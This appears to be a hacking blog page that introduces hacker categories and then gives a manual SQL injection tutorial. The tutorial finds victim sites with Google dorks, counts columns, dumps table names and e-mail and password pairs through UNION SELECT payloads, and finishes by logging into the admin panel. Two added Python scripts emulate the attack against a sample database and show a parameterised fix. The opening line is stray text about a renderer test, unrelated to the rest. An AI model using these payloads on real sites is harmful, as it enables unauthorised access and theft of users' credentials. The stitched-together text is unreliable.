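The escaped renderer still reflects the marker, which is what the post's Test 1 looks for; the difference only shows up in Test 2, where the script tag comes back as &lt;script&gt; and the browser renders it as text.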

What is computer hacking? Introduction to Hacking





What is computer hacking?
In the cyber security world, a person who is able to discover a weakness in a system and exploit it to accomplish his goal is referred to as a hacker, and the process is referred to as hacking.

Nowadays, people have started to think that hacking is only hijacking Facebook accounts or defacing websites. Yes, that is also part of the hacking field, but it doesn't mean that it is the main part of hacking.

So what exactly is hacking, and what should I do to become a hacker?! Don't worry, you will learn it from my blog, Break The Security. The main thing you need to become a hacker is self-interest. You should always be ready to learn something and to create something new.


Now, let me explain the different kinds of hackers in the cyber security world.

Script Kiddie

Script kiddies are people who use tools, scripts, methods and programs created by real hackers. In simple words, someone who doesn't know how a system works but is still able to exploit it with previously available tools.

White Hat Hacker:
White hat hackers are the good guys, who hack for defensive purposes. The main aim of a white hat hacker is to improve the security of a system by finding security flaws and fixing them. They work for an organisation or individually to make cyberspace more secure.

Break The Security concentrates only on white-hat hacking and helps you learn the ethical hacking world.

Black Hat Hacker:
Black hat hackers are the bad guys, cyber criminals who have malicious intent. Hackers who steal money, infect systems with malware, etc. are referred to as black hat hackers. They use their hacking skills for illegal purposes.

Grey Hat Hackers:


Hackers who may work offensively or defensively, depending on the situation. They don't have malicious intentions but still like to break into third-party systems for fun or just to show that a vulnerability exists.

Hacktivists
Hackers who use their hacking skills to protest against injustice, attacking target systems and websites to bring about what they see as justice. One of the most popular hacktivist groups is Anonymous.

 


Manual Sql Injection Tutorial

 


This is for educational purposes only; we are not responsible for anything.

In this tutorial I will demonstrate how to exploit a SQL-injectable website and how to dig out juicy information such as the website's administrator username and password. I will show you how to exploit a vulnerable site using a live example, i.e. a SQL-injectable website.



What is SQLi?
SQLi stands for SQL injection. A web application builds SQL queries to talk to its database; when it pastes user input (such as a URL parameter) straight into the query text, an attacker can supply input that changes the query itself.


Confused by the technical jargon?
OK, I will make it simple. A website stores its information in tables inside a database, and the usernames and passwords for the site's admin area are usually stored in the same database. The application sends queries to the database and the database answers them. With SQL injection we make the application send our query instead of its own, so we can read the admin's username and password out of the database and from there get into the site's administration area.


So Lets Start Now,


Things required:
1. A SQL-injectable website (of course :P)
2. Patience
3. Brain xD !





Searching for targets is a lot easier than it sounds. The most common method is to use "dorks". A dork is a query for a search engine (Google) that tries to find websites containing the text given in the dork itself. So navigate to


Google and copy the following into the search box:
inurl:"products.php?prodID="
This search returns websites indexed by Google with "products.php?prodID=" in the URL.
You can find a wide range of dorks by searching the forum.
I advise you to create your own dorks; be original but at the same time unique, and think of something that not many people have already searched and tested.
An example of a dork I would make up:
inurl:"/shop/index.php?item_id=" & ".co.uk"
So using your own dorks isn't a bad thing at all. Sometimes your dorks won't work; never mind,
even I get that...


Testing Targets for Vulnerabilities
It's important that this part's done well. I'll explain this as simply as I can.
After opening a URL found in one of your dork results on Google, you need to test whether the site is vulnerable to SQL injection.

Example:
http://www.site.com/index.php?Client_id=23

To test, simply add a single quote ' at the end of the URL:

Example:
http://www.site.com/index.php?Client_id=23'

How to tell if the site is vulnerable:
- Missing text, images, spaces or scripts from the original page.
- Any kind of typical SQL error (a mysql_fetch_array() warning, "You have an error in your SQL syntax") etc.

The quote works because it ends the value the application pasted into its query and leaves an unbalanced quote behind, so the query no longer parses. If the site shows any of the above, the parameter reaches the database unescaped and the site is unfortunately vulnerable, which is where the fun starts. A site that shows no error is not necessarily safe, though: many sites hide database errors, so also compare Client_id=23+and+1=1 (same page as Client_id=23) with Client_id=23+and+1=2 (different or empty page). If the two differ, the condition is being evaluated by the database.


Finding Columns & the Vulnerable Columns
As I noted in the first section of the tutorial, I advise you to do pretty much everything manually with SQL injection, so by using the following commands (providing they're followed correctly) you will begin to see results in no time.

Example:
http://www.site.com/index.php?Client_id=23'
^^^^^^^^^^^^^^^^^^^^^^^^
IF THE SITE IS VULNERABLE
Refer to the following to check how many columns there are.
(order+by) ORDER BY n tells the database to sort the results by the n-th column of the query. If the original query selects at least n columns the page loads normally; if it selects fewer than n, the database returns an error ("Unknown column '4' in 'order clause'"), so that column doesn't exist.

wxw.site.com/index.php?Client_id=23+order+by+1 < No Error
wxw.site.com/index.php?Client_id=23+order+by+2 < No Error
wxw.site.com/index.php?Client_id=23+order+by+3 < No Error
wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR

Using order+by and incrementing the number each time until the page displays an error is the easiest way to count the columns. In the example above, ordering by 4 gives an error, so column 4 doesn't exist and the query has 3 columns.


Finding Vulnerable Columns
Ok so let's say we were working on the site I used above, which has 3 columns. We now need to find out which of those three columns are vulnerable, i.e. which of them the page actually displays, because those are the ones we can read data out of. (union+select) UNION SELECT appends a second result set with the same number of columns to the original query; the values we supply become a row in the result, and whichever of them shows up on the page tells us which column is rendered, e.g.

2. Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3
The site should refresh, not with an error but with some content missing and a number displayed on the page, either 1, 2 or 3 (as we selected three columns in the above URL to test which one is shown).
Sometimes the page returns looking completely normal, which isn't a problem: the page only renders the first row, and that is still the genuine Client_id=23 record. On such sites you need to null the value you're injecting into, so that the original query matches nothing and the only row left is ours.
In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order to reveal the vulnerable column. So we simply put a hyphen (minus sign) before the 23, like so: -23

So the URL should now look something like this:

www.site.com/index.php?Client_id=-23+union+select+1,2,3

Now that should work. Let's say the page refreshes and displays a 2 on the page, so 2 is the vulnerable column for us to inject into.
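The three steps above (the quote test, counting columns with ORDER BY, and finding the rendered column with UNION SELECT) as an added worked example; this code is not from the original tutorial. It emulates the vulnerable index.php page with an in-memory sqlite3 database holding constructed sample rows, because sqlite runs offline; the probing queries behave the same way against MySQL. The function names, the table layout and the marker-detection rule are all assumptions made for this example. The page renders only the name and city columns, which is why the id column never shows up as a marker, and safe_page shows the fix: the same query with the value bound as a parameter.

```python
import sqlite3

# Constructed sample database standing in for the target site (not real data).
# sqlite3 is used so this runs offline; ORDER BY / UNION SELECT probing is the
# same against MySQL.
SCHEMA = """
CREATE TABLE clients (id INTEGER, name TEXT, city TEXT);
INSERT INTO clients VALUES (23, 'Acme Ltd', 'Leeds');
CREATE TABLE users (user_id INTEGER, email TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin@example.test', 'hunter2');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_page(db, client_id):
    """Emulates index.php?Client_id=... built by string concatenation.
    Only name (column 2) and city (column 3) are rendered; id (column 1) is not.
    Returns the rendered HTML, or None when the database raised an error
    (the equivalent of the mysql_fetch_array() warning the tutorial looks for)."""
    sql = f"SELECT id, name, city FROM clients WHERE id = {client_id}"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "".join(f"<h1>{name}</h1><p>{city}</p>" for _id, name, city in rows)


def safe_page(db, client_id):
    """The fixed version: the value is bound as a parameter, so it is compared
    with the id column and never parsed as SQL."""
    sql = "SELECT id, name, city FROM clients WHERE id = ?"
    rows = db.execute(sql, (client_id,)).fetchall()
    return "".join(f"<h1>{name}</h1><p>{city}</p>" for _id, name, city in rows)


def is_injectable(page):
    """Step 1: a trailing single quote breaks the query only if the input
    reaches the database unescaped."""
    return page("23") is not None and page("23'") is None


def count_columns(page, max_cols=20):
    """Step 2: ORDER BY n errors once n exceeds the number of selected columns,
    so the last n that loads cleanly is the column count."""
    for n in range(1, max_cols + 1):
        if page(f"23 ORDER BY {n}") is None:
            return n - 1
    return None


def reflected_columns(page, ncols):
    """Step 3: null the real row with -23 and UNION in the markers 1..ncols;
    the markers that appear in the output are the columns the page renders."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"-23 UNION SELECT {markers}")
    if not html:
        return []
    return [i for i in range(1, ncols + 1) if f">{i}<" in html]


if __name__ == "__main__":
    db = make_db()
    page = lambda value: vulnerable_page(db, value)
    print("injectable:", is_injectable(page))
    n = count_columns(page)
    print("columns:", n, "rendered columns:", reflected_columns(page, n))
    print("safe page with payload:", repr(safe_page(db, "-23 UNION SELECT 1,2,3")))
```

Against the emulated page the probe reports 3 columns and that columns 2 and 3 are rendered, matching the tutorial's "2 is the vulnerable column" result; the same payloads against safe_page return an empty page because the bound value is compared as data.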


Obtaining the SQL Version
Easier said than done. Using the information found in the above sections, i.e. the number of columns and the vulnerable column, we now use the MySQL system variable @@version (and in some cases a series of commands) to determine which version of MySQL the site runs, version 4 or version 5. This matters because the way we list tables differs between them (see below). See the example below for what the URL should look like when @@version has been inserted in place of the number 2, as 2 is the vulnerable column on the example site.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3

What you need to look for is a series of numbers e.g:
5.0.89-community
4.0.45-log

If the above fails and the site just returns an error or displays normally, the usual cause is a character-set mismatch between the column and our value ("Illegal mix of collations"), so we use the convert() function to make the value match the column's character set. Don't worry though, this is usually the only thing you need to convert and it's a rare occasion where this is the case.

So, if the example site returned an error we need to replace @@version with the convert() function:
convert(@@version using latin1)

So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3

If the page still returns an error, pass the value through hex and back, which also strips the collation:
unhex(hex(@@version))

So the example site will now look like this:
wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3


Depending on which version of MySQL the server runs, 4 or 5, the queries for obtaining data are different; version 4 and version 5 are explained below.

Version 4
- 1. Obtaining Tables and Columns

You will notice that obtaining tables and columns from MySQL 4 servers is a little more time consuming and confusing at times, as we have to guess pretty much everything. MySQL 5 introduced information_schema, a built-in database that lists every database, table and column on the server; MySQL 4 doesn't have it.
Providing the MySQL version of the website is 4, we must do the following.


So, back to the example URL:
wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3

We must now go back to the original URL (keep the minus sign on the 23 if you needed it earlier):
wxw.site.com/index.php?Client_id=23+union+select+1,2,3

This is where the guessing begins: we need to guess table names.
How can we tell if the table name I guess exists?
The same way we tested for the number of columns: if no error is produced, the guessed table exists; if there is an error ("Table 'db.admin' doesn't exist"), it doesn't, so just try another.
So we use the (from) keyword followed by the table name you want to check.


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin


Usually the tables people look for are the ones holding user data, so again, be creative just like with the dorks. Common table names I use:


tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins


So if we tried the following as an example:


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users
^^^^^
No Error


Now which table do you think exists..?
The table users exists


We are now required to guess column names in the existing table. So thinking logically, which columns in this table would hold the data we want? Columns such as:
first_name, last_name, email, username, password, pass, user_id
^^^^^^^^^^^^^^^^^^^^^^^^^
Typical columns found in the users table.


So we now must think back to which column is vulnerable (in this case 2) and replace the 2 in the URL with the column name you want to check for in the users table. Let's try a few of the typical ones listed above:
wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users
^^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users
^^^
Error


wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users
^^^^^
No Error


From the above we can clearly see that the column email exists within the table users, and the page should now display data from it (most probably an email address). Likewise, if you pulled password from users and the column exists, the first password in that column will be displayed on screen.




2. Commands
From here we can use certain functions to control how much data we pull from the database, or which exact record we pull from a column.
concat()
We use the concat() function to extract data from multiple columns when only one column is vulnerable; remembering back, the vulnerable column is 2, so we can only read within that one space.

Command: concat(columnname1,0x3a,columnname2)
0x3a is the hex value of a colon (:), written as a hex literal so no quotes are needed, so the output data from the query will be displayed

like:this


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users


The above will output the first email and password found in the table.


group_concat():

We now use the group_concat() function to gather all the rows of a column into one value and display them on one page. It works the same as the concat() command above, just grouping all records together and displaying them as one. Note that MySQL truncates group_concat() output at group_concat_max_len (1024 characters by default), so on a large table you will not see everything in one go.

Example:
wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from users
Now the above should return ALL e-mails and passwords listed in the email and pass columns of the users table.


limit 0,1
The limit command is useful if you're looking for a specific record. LIMIT takes an offset and a count, and the first record is at offset 0, so limit 0,1 returns the first record, limit 1,1 the second, and so on. Say we wanted the 250th e-mail in the table users: we would use limit 249,1. (limit 250,1, as in the example below, skips 250 records and returns the 251st.)


Example:
wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1


Version 5
- 1. Obtaining Table Names

Now after that painstaking version 4 malarkey lol, we're onto version 5, the easiest and quickest version of MySQL to hack: so many things are already done for you, so realise the possibilities and be imaginative.
Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables for table extraction.


So, example of the URL from earlier, but imagine it is now version 5


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tables


The above URL will display only the first table name listed in information_schema.tables, because the page renders a single row. So we use group_concat(), which works on the same principle as in version 4.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from information_schema.tables


We should now be able to see all the tables listed on one page. Sometimes the last tables will be cut off the end, because a portion of the page is taken up by the built-in tables of information_schema and the other system databases, which aren't useful to us. So I usually prefer to display table names from the site's own database rather than from every database on the server, which we do by adding +where+table_schema=database() to the query:
where => restricts which rows are returned
table_schema => the database each table belongs to
database() => the database the current page is connected to, just leave it as it is.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()


Example List of tables:
About, Admin, Affiliates, Access, Customer, Users


Now all tables should be displayed from the primary database, take your pick and get ready
to extract columns.




2. Obtaining Column Names from Table Names

Ok, say that from the above we decided to obtain column information from the table Admin.
We use information_schema once again, but this time:
information_schema.columns
instead of
information_schema.tables (as we want to extract columns now, not tables)
Obtaining column names works on the same principle as in version 4, except we don't have to guess: one query lists them all when combined with group_concat().


Command:
Edit the vulnerable column (in this case 2) to:
column_name instead of table_name


And the end of the URL to:
+from+information_schema.columns where table_name=TableNameHEX


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin


Now the above will return an error because of the way the condition at the end of the URL is written (where table_name=Admin): without quotes MySQL reads Admin as a column name, not a string, and quoting it ('Admin') only works if the site doesn't escape quotes. So we write the table name as a hex literal instead, in this case Admin.
Any text-to-hex converter will do (so will MySQL's own hex() function).

The HEX of Admin is: 41646d696e
Now we add the 0x prefix, which tells MySQL this is a hexadecimal string literal, so it should now look like this: 0x41646d696e
Pop it onto the end of the URL replacing Admin, and the URL should look something like the following.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e


Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.


Say for instance the following columns were displayed:
username, password, id, admin_user


We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.


Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin


This will display the first username and password from the columns username and password in the table Admin.
Now find the admin panel of the website and log in with the recovered username and password.
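The extraction steps from the Commands section (concat, group_concat and limit), the version 4 guess-a-column check, and the version 5 table and column listing, together as one added worked example; none of this code is from the original tutorial. The target page is again emulated with an in-memory sqlite3 database holding constructed rows, so two sqlite stand-ins are used and named in the comments: sqlite_master and pragma_table_info() take the place of information_schema.tables and information_schema.columns, and || takes the place of concat(...,0x3a,...). The payload shapes are otherwise the tutorial's own: -23 to null the real row, the expression in column 2 of 3, and FROM table LIMIT offset,1. All function names are assumptions made for this example.

```python
import re
import sqlite3

# Constructed sample database standing in for the target site (not real data).
SCHEMA = """
CREATE TABLE clients (id INTEGER, name TEXT, city TEXT);
INSERT INTO clients VALUES (23, 'Acme Ltd', 'Leeds');
CREATE TABLE users (user_id INTEGER, email TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice@example.test', 'hunter2'),
                         (2, 'bob@example.test',   'letmein'),
                         (3, 'carol@example.test', 'passw0rd');
CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'admin', 'S3cr3t!');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_page(db, client_id):
    """index.php?Client_id=... built by string concatenation. The page renders
    only the name column (column 2 of 3), which is the reflected column."""
    sql = f"SELECT id, name, city FROM clients WHERE id = {client_id}"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "".join(f"<h1>{name}</h1>" for _id, name, _city in rows)


def extract(page, expression, source):
    """Place an expression in the reflected column, null the real row with -23,
    and read the value back out of the rendered HTML.
    Returns None if the database errored, "" if the query returned no rows."""
    html = page(f"-23 UNION SELECT 1,{expression},3 FROM {source}")
    if html is None:
        return None
    found = re.findall(r"<h1>(.*?)</h1>", html)
    return found[0] if found else ""


def column_exists(page, table, column):
    """Version 4 style guessing: the query errors when the table or column is missing."""
    return extract(page, column, table) is not None


def list_tables(page):
    # MySQL: group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
    # sqlite stand-in: sqlite_master carries the same information.
    return extract(page, "group_concat(name)", "sqlite_master WHERE type='table'")


def list_columns(page, table):
    # MySQL: group_concat(column_name) FROM information_schema.columns WHERE table_name=0x...
    # sqlite stand-in: the pragma_table_info() table-valued function.
    return extract(page, "group_concat(name)", f"pragma_table_info('{table}')")


def dump_all(page, table, col_a, col_b):
    # MySQL spelling is group_concat(concat(col_a,0x3a,col_b)); sqlite concatenates with ||.
    return extract(page, f"group_concat({col_a} || ':' || {col_b})", table)


def nth_row(page, table, column, offset):
    # LIMIT offset,1 skips `offset` rows and returns one, i.e. record number offset+1.
    return extract(page, column, f"{table} LIMIT {offset},1")


if __name__ == "__main__":
    db = make_db()
    page = lambda value: vulnerable_page(db, value)
    print("tables:", list_tables(page))
    print("admin columns:", list_columns(page, "admin"))
    print("admin creds:", dump_all(page, "admin", "username", "password"))
    print("third user e-mail:", nth_row(page, "users", "email", 2))
    print("users.f_name exists:", column_exists(page, "users", "f_name"))
```

Because the original row is nulled, the LIMIT in nth_row applies to the single remaining result set; if a stable order matters, add an ORDER BY, since neither MySQL nor sqlite guarantees the row order of a UNION.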


Now Clap For Yourself :D



